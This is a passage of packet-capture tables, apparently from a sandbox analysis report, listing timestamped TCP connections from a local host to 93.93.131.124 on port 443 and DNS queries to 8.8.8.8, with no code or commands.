| Dec 4, 2022 12:11:47.298980951 CET | 49751 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:47.299029112 CET | 443 | 49751 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.299048901 CET | 443 | 49751 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.299076080 CET | 49751 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:47.332137108 CET | 443 | 49751 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.332170963 CET | 443 | 49751 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.332278967 CET | 443 | 49751 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.332323074 CET | 443 | 49751 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.332329988 CET | 443 | 49751 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.332386017 CET | 49751 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:47.332438946 CET | 443 | 49751 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.332479000 CET | 443 | 49751 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.332493067 CET | 49751 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:47.332508087 CET | 443 | 49751 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.332532883 CET | 49751 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:47.332535982 CET | 443 | 49751 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.332556009 CET | 49751 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:47.332571030 CET | 49751 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:47.332588911 CET | 49751 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:47.366352081 CET | 443 | 49751 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.366468906 CET | 443 | 49751 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.366523981 CET | 49751 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:47.366559982 CET | 443 | 49751 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.366580009 CET | 49751 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:47.366605997 CET | 49751 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:47.366797924 CET | 443 | 49751 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.366854906 CET | 49751 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:47.366992950 CET | 443 | 49751 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.367064953 CET | 49751 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:47.367247105 CET | 443 | 49751 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.367315054 CET | 49751 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:47.367790937 CET | 443 | 49751 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.367857933 CET | 49751 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:47.400753975 CET | 443 | 49751 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.400964975 CET | 49751 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:47.401130915 CET | 443 | 49751 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.401206017 CET | 49751 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:47.401597977 CET | 443 | 49751 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.401671886 CET | 49751 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:47.402074099 CET | 443 | 49751 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.402143002 CET | 49751 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:47.402589083 CET | 443 | 49751 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.402658939 CET | 49751 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:47.402934074 CET | 443 | 49751 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.403002977 CET | 49751 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:47.403244972 CET | 443 | 49751 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:11:47.403311968 CET | 49751 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:11:47.498420954 CET | 49751 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:12:23.384247065 CET | 49753 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:12:23.384350061 CET | 443 | 49753 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:12:23.384438038 CET | 49753 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:12:23.398196936 CET | 49753 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:12:23.398231030 CET | 443 | 49753 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:12:23.501656055 CET | 443 | 49753 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:12:23.501902103 CET | 49753 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:12:23.517901897 CET | 49753 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:12:23.517952919 CET | 443 | 49753 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:12:23.518392086 CET | 443 | 49753 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:12:23.540829897 CET | 49753 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:12:23.540874004 CET | 443 | 49753 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:12:23.579134941 CET | 443 | 49753 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:12:23.579240084 CET | 443 | 49753 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:12:23.579310894 CET | 49753 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:12:23.580126047 CET | 49753 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:12:23.587474108 CET | 49754 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:12:23.587542057 CET | 443 | 49754 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:12:23.587654114 CET | 49754 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:12:23.588108063 CET | 49754 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:12:23.588130951 CET | 443 | 49754 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:12:23.694113970 CET | 443 | 49754 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:12:23.697709084 CET | 49754 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:12:23.697757006 CET | 443 | 49754 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:12:23.762275934 CET | 443 | 49754 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:12:23.762329102 CET | 443 | 49754 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:12:23.762411118 CET | 49754 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:12:23.762444973 CET | 443 | 49754 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:12:23.767592907 CET | 49754 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:12:59.744118929 CET | 49755 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:12:59.744204044 CET | 443 | 49755 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:12:59.744292974 CET | 49755 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:12:59.765971899 CET | 49755 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:12:59.766038895 CET | 443 | 49755 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:12:59.879827023 CET | 443 | 49755 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:12:59.879987001 CET | 49755 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:12:59.882508993 CET | 49755 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:12:59.882534981 CET | 443 | 49755 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:12:59.883647919 CET | 443 | 49755 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:12:59.903873920 CET | 49755 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:12:59.903918028 CET | 443 | 49755 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:12:59.943161964 CET | 443 | 49755 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:12:59.943334103 CET | 443 | 49755 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:12:59.943413019 CET | 49755 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:12:59.943945885 CET | 49755 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:12:59.947537899 CET | 49756 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:12:59.947603941 CET | 443 | 49756 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:12:59.947704077 CET | 49756 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:12:59.948038101 CET | 49756 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:12:59.948080063 CET | 443 | 49756 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:13:00.062756062 CET | 443 | 49756 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:13:00.064959049 CET | 49756 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:13:00.065016031 CET | 443 | 49756 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:13:00.127743959 CET | 443 | 49756 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:13:00.127796888 CET | 443 | 49756 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:13:00.127890110 CET | 49756 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:13:00.127918959 CET | 443 | 49756 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:13:00.129988909 CET | 49756 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:13:34.773577929 CET | 49757 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:13:34.773627996 CET | 443 | 49757 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:13:34.773720026 CET | 49757 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:13:34.783016920 CET | 49757 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:13:34.783057928 CET | 443 | 49757 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:13:34.874950886 CET | 443 | 49757 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:13:34.875055075 CET | 49757 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:13:34.877571106 CET | 49757 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:13:34.877598047 CET | 443 | 49757 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:13:34.878148079 CET | 443 | 49757 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:13:34.900981903 CET | 49757 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:13:34.901004076 CET | 443 | 49757 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:13:34.938039064 CET | 443 | 49757 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:13:34.938213110 CET | 443 | 49757 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:13:34.938271046 CET | 49757 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:13:34.938694954 CET | 49757 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:13:34.939785957 CET | 49758 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:13:34.939851046 CET | 443 | 49758 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:13:34.939934015 CET | 49758 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:13:34.940249920 CET | 49758 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:13:34.940282106 CET | 443 | 49758 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:13:35.041718006 CET | 443 | 49758 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:13:35.044869900 CET | 49758 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:13:35.044907093 CET | 443 | 49758 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:13:35.106936932 CET | 443 | 49758 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:13:35.107050896 CET | 443 | 49758 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:13:35.107136965 CET | 49758 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:13:35.107178926 CET | 443 | 49758 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:13:35.111320019 CET | 49758 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:14:11.495742083 CET | 49759 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:14:11.495820045 CET | 443 | 49759 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:14:11.495908022 CET | 49759 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:14:11.505218983 CET | 49759 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:14:11.505256891 CET | 443 | 49759 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:14:11.615803003 CET | 443 | 49759 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:14:11.615897894 CET | 49759 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:14:11.626995087 CET | 49759 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:14:11.627031088 CET | 443 | 49759 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:14:11.627744913 CET | 443 | 49759 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:14:11.646373034 CET | 49759 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:14:11.646411896 CET | 443 | 49759 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:14:11.681740999 CET | 443 | 49759 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:14:11.681879997 CET | 443 | 49759 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:14:11.681948900 CET | 49759 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:14:11.682410002 CET | 49759 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:14:11.683417082 CET | 49760 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:14:11.683497906 CET | 443 | 49760 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:14:11.683597088 CET | 49760 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:14:11.683931112 CET | 49760 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:14:11.683988094 CET | 443 | 49760 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:14:11.774501085 CET | 443 | 49760 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:14:11.776462078 CET | 49760 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:14:11.776515007 CET | 443 | 49760 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:14:11.839658976 CET | 443 | 49760 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:14:11.839740992 CET | 443 | 49760 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:14:11.839829922 CET | 49760 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:14:11.839881897 CET | 443 | 49760 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:14:11.842081070 CET | 49760 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:14:52.060702085 CET | 49761 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:14:52.060775042 CET | 443 | 49761 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:14:52.060885906 CET | 49761 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:14:52.064373970 CET | 49761 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:14:52.064404011 CET | 443 | 49761 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:14:52.174582958 CET | 443 | 49761 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:14:52.174715042 CET | 49761 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:14:52.176582098 CET | 49761 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:14:52.176597118 CET | 443 | 49761 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:14:52.177454948 CET | 443 | 49761 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:14:52.182467937 CET | 49761 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:14:52.182480097 CET | 443 | 49761 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:14:52.237910986 CET | 443 | 49761 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:14:52.238056898 CET | 443 | 49761 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:14:52.238440990 CET | 49761 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:14:52.238615036 CET | 49761 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:14:52.239429951 CET | 49762 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:14:52.239499092 CET | 443 | 49762 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:14:52.239598036 CET | 49762 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:14:52.239929914 CET | 49762 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:14:52.239974022 CET | 443 | 49762 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:14:52.352305889 CET | 443 | 49762 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:14:52.401776075 CET | 49762 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:14:52.401822090 CET | 443 | 49762 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:14:52.437743902 CET | 443 | 49762 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:14:52.437830925 CET | 443 | 49762 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:14:52.437848091 CET | 443 | 49762 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:14:52.437911987 CET | 49762 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:14:52.437949896 CET | 443 | 49762 | 93.93.131.124 | 192.168.2.3 |
| Dec 4, 2022 12:14:52.437978983 CET | 49762 | 443 | 192.168.2.3 | 93.93.131.124 |
| Dec 4, 2022 12:14:52.439403057 CET | 49762 | 443 | 192.168.2.3 | 93.93.131.124 |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Dec 4, 2022 12:05:56.907921076 CET | 57990 | 53 | 192.168.2.3 | 8.8.8.8 |
| Dec 4, 2022 12:05:56.927194118 CET | 53 | 57990 | 8.8.8.8 | 192.168.2.3 |
| Dec 4, 2022 12:06:08.494337082 CET | 52387 | 53 | 192.168.2.3 | 8.8.8.8 |
| Dec 4, 2022 12:06:08.514309883 CET | 53 | 52387 | 8.8.8.8 | 192.168.2.3 |
| Dec 4, 2022 12:06:12.302277088 CET | 56924 | 53 | 192.168.2.3 | 8.8.8.8 |
| Dec 4, 2022 12:06:12.321561098 CET | 53 | 56924 | 8.8.8.8 | 192.168.2.3 |
| Dec 4, 2022 12:06:19.905052900 CET | 60625 | 53 | 192.168.2.3 | 8.8.8.8 |
| Dec 4, 2022 12:06:19.922585011 CET | 53 | 60625 | 8.8.8.8 | 192.168.2.3 |
| Dec 4, 2022 12:06:27.940740108 CET | 49302 | 53 | 192.168.2.3 | 8.8.8.8 |
| Dec 4, 2022 12:06:27.960360050 CET | 53 | 49302 | 8.8.8.8 | 192.168.2.3 |
| Dec 4, 2022 12:06:38.438869953 CET | 53975 | 53 | 192.168.2.3 | 8.8.8.8 |
| Dec 4, 2022 12:06:38.456780910 CET | 53 | 53975 | 8.8.8.8 | 192.168.2.3 |
| Dec 4, 2022 12:06:51.138170004 CET | 51139 | 53 | 192.168.2.3 | 8.8.8.8 |
| Dec 4, 2022 12:06:51.157512903 CET | 53 | 51139 | 8.8.8.8 | 192.168.2.3 |
| Dec 4, 2022 12:07:09.043278933 CET | 52955 | 53 | 192.168.2.3 | 8.8.8.8 |
| Dec 4, 2022 12:07:09.062927008 CET | 53 | 52955 | 8.8.8.8 | 192.168.2.3 |
| Dec 4, 2022 12:07:25.428874016 CET | 60582 | 53 | 192.168.2.3 | 8.8.8.8 |
| Dec 4, 2022 12:07:25.446450949 CET | 53 | 60582 | 8.8.8.8 | 192.168.2.3 |
| Dec 4, 2022 12:07:43.083144903 CET | 57134 | 53 | 192.168.2.3 | 8.8.8.8 |
| Dec 4, 2022 12:07:43.102032900 CET | 53 | 57134 | 8.8.8.8 | 192.168.2.3 |
| Dec 4, 2022 12:08:01.241962910 CET | 62050 | 53 | 192.168.2.3 | 8.8.8.8 |
| Dec 4, 2022 12:08:01.275760889 CET | 53 | 62050 | 8.8.8.8 | 192.168.2.3 |
| Dec 4, 2022 12:08:20.976408958 CET | 56042 | 53 | 192.168.2.3 | 8.8.8.8 |
| Dec 4, 2022 12:08:20.996439934 CET | 53 | 56042 | 8.8.8.8 | 192.168.2.3 |
| Dec 4, 2022 12:08:46.819705963 CET | 59636 | 53 | 192.168.2.3 | 8.8.8.8 |
| Dec 4, 2022 12:08:46.837131977 CET | 53 | 59636 | 8.8.8.8 | 192.168.2.3 |
| Dec 4, 2022 12:09:16.445884943 CET | 55638 | 53 | 192.168.2.3 | 8.8.8.8 |
| Dec 4, 2022 12:09:16.465509892 CET | 53 | 55638 | 8.8.8.8 | 192.168.2.3 |
| Dec 4, 2022 12:09:40.231570959 CET | 57704 | 53 | 192.168.2.3 | 8.8.8.8 |
| Dec 4, 2022 12:09:40.251262903 CET | 53 | 57704 | 8.8.8.8 | 192.168.2.3 |
| Dec 4, 2022 12:10:11.477601051 CET | 65320 | 53 | 192.168.2.3 | 8.8.8.8 |
| Dec 4, 2022 12:10:11.498589039 CET | 53 | 65320 | 8.8.8.8 | 192.168.2.3 |
| Dec 4, 2022 12:10:38.682018042 CET | 60767 | 53 | 192.168.2.3 | 8.8.8.8 |
| Dec 4, 2022 12:10:38.699805975 CET | 53 | 60767 | 8.8.8.8 | 192.168.2.3 |
| Dec 4, 2022 12:11:11.276024103 CET | 53848 | 53 | 192.168.2.3 | 8.8.8.8 |
| Dec 4, 2022 12:11:11.293838024 CET | 53 | 53848 | 8.8.8.8 | 192.168.2.3 |
| Dec 4, 2022 12:11:46.793123960 CET | 56949 | 53 | 192.168.2.3 | 8.8.8.8 |
| Dec 4, 2022 12:11:46.812508106 CET | 53 | 56949 | 8.8.8.8 | 192.168.2.3 |
| Dec 4, 2022 12:12:23.322580099 CET | 53844 | 53 | 192.168.2.3 | 8.8.8.8 |
| Dec 4, 2022 12:12:23.339870930 CET | 53 | 53844 | 8.8.8.8 | 192.168.2.3 |
| Dec 4, 2022 12:12:59.706125021 CET | 65017 | 53 | 192.168.2.3 | 8.8.8.8 |
| Dec 4, 2022 12:12:59.725790024 CET | 53 | 65017 | 8.8.8.8 | 192.168.2.3 |
| Dec 4, 2022 12:13:34.705316067 CET | 53466 | 53 | 192.168.2.3 | 8.8.8.8 |
| Dec 4, 2022 12:13:34.724473000 CET | 53 | 53466 | 8.8.8.8 | 192.168.2.3 |
| Dec 4, 2022 12:14:11.451714039 CET | 57743 | 53 | 192.168.2.3 | 8.8.8.8 |
| Dec 4, 2022 12:14:11.469310045 CET | 53 | 57743 | 8.8.8.8 | 192.168.2.3 |
| Dec 4, 2022 12:14:52.032318115 CET | 53623 | 53 | 192.168.2.3 | 8.8.8.8 |
| Dec 4, 2022 12:14:52.051832914 CET | 53 | 53623 | 8.8.8.8 | 192.168.2.3 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Dec 4, 2022 12:05:56.907921076 CET | 192.168.2.3 | 8.8.8.8 | 0x9313 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Dec 4, 2022 12:06:08.494337082 CET | 192.168.2.3 | 8.8.8.8 | 0xe9fe | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Dec 4, 2022 12:06:12.302277088 CET | 192.168.2.3 | 8.8.8.8 | 0x5a19 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Dec 4, 2022 12:06:19.905052900 CET | 192.168.2.3 | 8.8.8.8 | 0xd5c1 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Dec 4, 2022 12:06:27.940740108 CET | 192.168.2.3 | 8.8.8.8 | 0x3fcc | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Dec 4, 2022 12:06:38.438869953 CET | 192.168.2.3 | 8.8.8.8 | 0xe56 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Dec 4, 2022 12:06:51.138170004 CET | 192.168.2.3 | 8.8.8.8 | 0x92c5 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Dec 4, 2022 12:07:09.043278933 CET | 192.168.2.3 | 8.8.8.8 | 0x9d0a | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Dec 4, 2022 12:07:25.428874016 CET | 192.168.2.3 | 8.8.8.8 | 0xed79 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Dec 4, 2022 12:07:43.083144903 CET | 192.168.2.3 | 8.8.8.8 | 0x3d3 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Dec 4, 2022 12:08:01.241962910 CET | 192.168.2.3 | 8.8.8.8 | 0x1ae0 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Dec 4, 2022 12:08:20.976408958 CET | 192.168.2.3 | 8.8.8.8 | 0x11d7 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Dec 4, 2022 12:08:46.819705963 CET | 192.168.2.3 | 8.8.8.8 | 0xc8c8 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Dec 4, 2022 12:09:16.445884943 CET | 192.168.2.3 | 8.8.8.8 | 0x71c9 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Dec 4, 2022 12:09:40.231570959 CET | 192.168.2.3 | 8.8.8.8 | 0xb0a3 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Dec 4, 2022 12:10:11.477601051 CET | 192.168.2.3 | 8.8.8.8 | 0x6b6a | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Dec 4, 2022 12:10:38.682018042 CET | 192.168.2.3 | 8.8.8.8 | 0xadbf | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Dec 4, 2022 12:11:11.276024103 CET | 192.168.2.3 | 8.8.8.8 | 0xdb9a | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Dec 4, 2022 12:11:46.793123960 CET | 192.168.2.3 | 8.8.8.8 | 0xf6f1 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Dec 4, 2022 12:12:23.322580099 CET | 192.168.2.3 | 8.8.8.8 | 0x1022 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Dec 4, 2022 12:12:59.706125021 CET | 192.168.2.3 | 8.8.8.8 | 0x82c2 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
| Dec 4, 2022 12:13:34.705316067 CET | 192.168.2.3 | 8.8.8.8 | 0xcea0 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
